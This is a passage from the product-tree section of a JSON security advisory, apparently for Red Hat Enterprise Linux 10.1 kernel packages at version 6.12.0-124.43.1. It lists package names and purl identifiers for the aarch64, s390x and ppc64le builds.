"name": "kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-modules@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-modules-core@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-debug-modules-extra@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-modules@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-modules-core@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-64k-modules-extra@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-core@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-core@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-core@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-extra@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-core@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-extra@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-extra-matched@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-libs@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-uki-virt@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-uki-virt-addons@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-libs-devel@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"product": {
"name": "libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"product_id": "libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf@6.12.0-124.43.1.el10_1?arch=aarch64"
}
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel-matched@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel-matched@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-devel@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-devel-matched@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "perf-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "perf-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "perf-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "rtla-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "rtla-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "rtla-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rtla@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "rv-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "rv-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "rv-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rv@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-debuginfo@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo-common-s390x@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-debuginfo@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-debuginfo@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf-debuginfo@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf-debuginfo@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf-debuginfo@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "kernel-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "kernel-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-core@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-core@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-core@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-extra@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-core@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-extra@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-extra-matched@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-core@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-modules@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-modules-core@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-modules-extra@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "libperf-0:6.12.0-124.43.1.el10_1.s390x",
"product": {
"name": "libperf-0:6.12.0-124.43.1.el10_1.s390x",
"product_id": "libperf-0:6.12.0-124.43.1.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf@6.12.0-124.43.1.el10_1?arch=s390x"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"product": {
"name": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_id": "kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel@6.12.0-124.43.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"product": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_id": "kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel-matched@6.12.0-124.43.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"product": {
"name": "kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_id": "kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel@6.12.0-124.43.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"product": {
"name": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_id": "kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel-matched@6.12.0-124.43.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"product": {
"name": "perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_id": "perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf@6.12.0-124.43.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"product": {
"name": "python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_id": "python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf@6.12.0-124.43.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"product": {
"name": "rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_id": "rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rtla@6.12.0-124.43.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"product": {
"name": "rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_id": "rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rv@6.12.0-124.43.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"product": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_id": "kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-debuginfo@6.12.0-124.43.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"product": {
"name": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_id": "kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo@6.12.0-124.43.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"product": {
"name": "kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_id": "kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo-common-ppc64le@6.12.0-124.43.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"product": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_id": "kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-debuginfo@6.12.0-124.43.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"product": {
"name": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_id": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf-debuginfo@6.12.0-124.43.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"product": {
"name": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_id": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf-debuginfo@6.12.0-124.43.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"product": {
"name": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_id": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf-debuginfo@6.12.0-124.43.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"product": {
